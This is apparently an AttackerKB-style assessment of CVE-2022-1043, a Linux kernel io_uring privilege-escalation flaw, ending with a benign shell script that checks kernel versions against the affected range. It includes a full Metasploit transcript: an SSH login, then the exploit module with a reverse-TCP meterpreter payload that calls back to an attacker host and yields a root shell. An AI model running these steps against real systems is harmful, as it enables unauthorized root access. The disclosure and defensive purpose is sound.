CVE-2022-1043
Description
A flaw was found in the Linux kernel’s io_uring implementation. This flaw allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges.
Ratings
- Attacker Value: Low
- Exploitability: Medium
Technical Analysis
Description
This vulnerability exists in the Linux kernel's io_uring implementation. It allows an attacker with a local account to corrupt system memory, crash the system, or escalate privileges in order to spawn a root shell.
Attacker Value & Exploitation
GitHub user @jvoisin explained that user @minipli-oss wrote a neat exploit for CVE-2022-1043, and that it has the following advantages over your everyday Linux LPE:
- No hardcoded offsets
- No ROP
- Architecture-agnostic-ish
- Bypasses all existing mitigations, even out-of-kernel ones like grsecurity (for versions older than the exploit, of course, since this class of vulnerabilities is now mitigated there) and LKRG.
The only drawback is that it only works on v5.12-rc3 through v5.14-rc7, a fairly small subset of Linux kernel versions.
If the system is vulnerable, exploitation is trivial. The aforementioned exploit has been integrated into Metasploit, which makes getting a root shell a piece of cake:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 username=msfuser password=notpassword
[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (172.16.199.1:60829 -> 172.16.199.132:22) at 2023-02-01 10:59:16 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/cve_2022_1043_io_uring_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lport 4447
lport => 4447
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > run
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4447
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. > 1 CPU required, detected: 2
[*] Writing '/tmp/.5Z1IxJt0' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.5Z1IxJt0
[+] Deleted /tmp/.qfp5AH76BB
[*] Meterpreter session 2 opened (172.16.199.1:4447 -> 172.16.199.132:49236) at 2023-02-01 10:59:51 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
Defensive Suggestions
Not much to say here other than: don't run a vulnerable kernel version. Patch!
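The only affected-version information on this page is the mainline range the assessment names, v5.12-rc3 through v5.14-rc7, and the one thing the defensive advice asks for is to know whether the running kernel falls inside it. The script below is an added example, not code from the AttackerKB assessment, from the exploit author or from the Metasploit module. It parses `uname -r` style strings (release, stable and -rcN forms, with any distro suffix stripped) into an orderable key and checks them against that inclusive range; the range boundaries and the function names are the example's own. It also reports the CPU count, since the Metasploit check in the transcript above wanted more than one CPU. The check looks only at the version string: a distribution kernel that carries a backported fix will still be flagged, so treat a hit as "investigate", and confirm against your vendor's changelog before concluding a host is vulnerable.

```sh
#!/bin/sh
# Added example: version-range check for the mainline kernels the
# assessment names as affected by CVE-2022-1043 (5.12-rc3 .. 5.14-rc7).
# Names and boundaries are this example's own, not the page's or the
# exploit's. String matching only; cannot see distro backports.

VULN_FIRST="5.12-rc3"   # first affected mainline version (inclusive)
VULN_LAST="5.14-rc7"    # last affected mainline version (inclusive)

# kver_key VERSION -> prints an integer that orders like the kernel
# numbering: 5.14-rc1 < 5.14-rc7 < 5.14 < 5.14.1 < 5.15-rc1.
# Returns 1 (and prints nothing useful) if VERSION is not a kernel version.
kver_key() {
    # Split "A.B[.C][-rcN]<anything>" into "A B pC rN"; the p/r prefixes
    # keep empty fields from collapsing when set -- re-splits on spaces.
    set -- $(printf '%s\n' "$1" | \
        sed -E 's/^([0-9]+)\.([0-9]+)(\.([0-9]+))?(-rc([0-9]+))?.*$/\1 \2 p\4 r\6/')
    [ $# -eq 4 ] || { echo 0; return 1; }
    kk_maj=$1; kk_min=$2; kk_pat=${3#p}; kk_rc=${4#r}
    kk_pat=${kk_pat:-0}
    # Release candidates sort below the final release of the same
    # A.B: rc N gets tail N (1..499), a final/stable release gets 500.
    if [ -n "$kk_rc" ]; then kk_tail=$kk_rc; else kk_tail=500; fi
    echo $(( kk_maj * 100000000 + kk_min * 1000000 + kk_pat * 1000 + kk_tail ))
}

# cve_2022_1043_in_range VERSION
#   exit 0: inside the affected mainline range
#   exit 1: outside it
#   exit 2: VERSION could not be parsed
cve_2022_1043_in_range() {
    cr_key=$(kver_key "$1") || return 2
    cr_lo=$(kver_key "$VULN_FIRST")
    cr_hi=$(kver_key "$VULN_LAST")
    [ "$cr_key" -ge "$cr_lo" ] && [ "$cr_key" -le "$cr_hi" ]
}

# Report on the running kernel. Written as a status capture rather than a
# bare call so a "not vulnerable" result does not abort under set -e.
running=$(uname -r 2>/dev/null || echo unknown)
cpus=$(nproc 2>/dev/null || echo '?')
cve_2022_1043_in_range "$running"; status=$?
case $status in
    0) echo "$running: inside the affected mainline range $VULN_FIRST..$VULN_LAST; verify distro backports. CPUs: $cpus (Metasploit check wants >1)" ;;
    1) echo "$running: outside the affected mainline range $VULN_FIRST..$VULN_LAST" ;;
    *) echo "$running: not a parseable kernel version" ;;
esac
```

Run it as-is on the host in question, or feed `cve_2022_1043_in_range` a version string taken from inventory data; the 5.13.12 mainline build in the transcript above lands inside the range, while 5.14 final and anything newer do not.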
General Information
Vendors
- linux
Products
- linux kernel